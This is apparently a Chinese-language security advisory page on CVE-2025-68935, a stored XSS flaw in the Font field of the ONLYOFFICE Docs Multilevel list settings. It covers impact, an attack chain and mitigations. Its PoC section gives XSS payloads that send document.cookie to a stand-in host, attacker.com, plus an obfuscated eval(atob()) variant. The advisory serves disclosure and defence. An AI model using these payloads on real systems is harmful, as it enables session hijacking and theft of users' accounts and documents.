IPBUF安全漏洞报告
English
CVE-2025-68935 CVSS 6.4 中危

CVE-2025-68935: ONLYOFFICE Docs Multilevel list设置窗口Font字段XSS漏洞

披露日期: 2025-12-25
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-68935
漏洞类型
XSS(跨站脚本攻击)
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
ONLYOFFICE Docs DocumentServer

相关标签

XSS跨站脚本ONLYOFFICEDocumentServer存储型XSSCVE-2025-68935文档协作平台Web应用漏洞

漏洞概述

CVE-2025-68935是ONLYOFFICE Docs文档服务器中的一个存储型跨站脚本(Stored XSS)漏洞。该漏洞存在于ONLYOFFICE Docs 9.2.1之前版本的Multilevel list(多级列表)设置窗口中,攻击者可以通过Font字段注入恶意JavaScript代码。由于该字段在保存后会在文档编辑界面中持续显示,恶意脚本将在受害者打开文档时自动执行,可能导致会话劫持、敏感数据窃取、恶意操作执行等严重后果。ONLYOFFICE Docs是一款流行的在线文档协作平台,广泛应用于企业办公场景,该漏洞的存在可能危及大量使用该平台进行文档协作的组织。

技术细节

该漏洞属于存储型XSS(Stored XSS),攻击过程如下:1. 攻击者在编辑ONLYOFFICE文档时,访问Multilevel list设置窗口;2. 在Font字段中注入恶意JavaScript代码,如<script>alert(document.cookie)</script>;3. 保存文档后,该恶意代码被存储在服务器端;4. 当其他用户打开或预览该文档时,恶意代码在受害者浏览器中执行;5. 攻击者可以利用此漏洞窃取用户会话cookie、劫持用户账号、执行任意操作或传播恶意内容。漏洞根源在于ONLYOFFICE DocumentServer在处理Font字段输入时未进行充分的输入验证和输出编码,导致恶意脚本被直接嵌入到DOM中。

攻击链分析

STEP 1
Reconnaissance
攻击者识别目标环境使用的是ONLYOFFICE Docs,并确认版本低于9.2.1
STEP 2
Initial Access
攻击者获得ONLYOFFICE文档编辑权限,创建或编辑文档
STEP 3
Payload Injection
攻击者在Multilevel list设置窗口的Font字段中注入恶意JavaScript/XSS代码
STEP 4
Persistence
包含恶意代码的文档保存到服务器,在文档打开时自动执行
STEP 5
Impact
恶意代码执行后,攻击者可窃取用户会话cookie、劫持账号、窃取文档内容或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// CVE-2025-68935 PoC - XSS via Font field in Multilevel list settings // Target: ONLYOFFICE Docs < 9.2.1 // Steps to reproduce: // 1. Open a document in ONLYOFFICE Docs // 2. Navigate to Multilevel list settings (Home > Multilevel list) // 3. Click on settings/options // 4. In the Font field, inject the following payload: var xssPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'; var altPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?data=\'+btoa(document.cookie))">'; var domPayload = '<svg onload="eval(atob(\'YWxlcnQoZG9jdW1lbnQuY29va2llKQ==\'))">'; // The payload will be stored and executed when other users view the document // This PoC demonstrates the XSS vulnerability in the Font field // Attack impact: Session hijacking, data theft, malicious operations

影响范围

ONLYOFFICE Docs < 9.2.1

防御指南

临时缓解措施
如无法立即升级,可采取以下临时措施:1) 限制文档编辑权限,仅允许可信用户创建和编辑文档;2) 在前端部署XSS过滤中间件;3) 监控和审查文档内容,特别是Multilevel list设置;4) 启用ONLYOFFICE的安全日志功能,监控异常行为;5) 考虑使用Web应用防火墙(WAF)规则检测XSS攻击特征。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表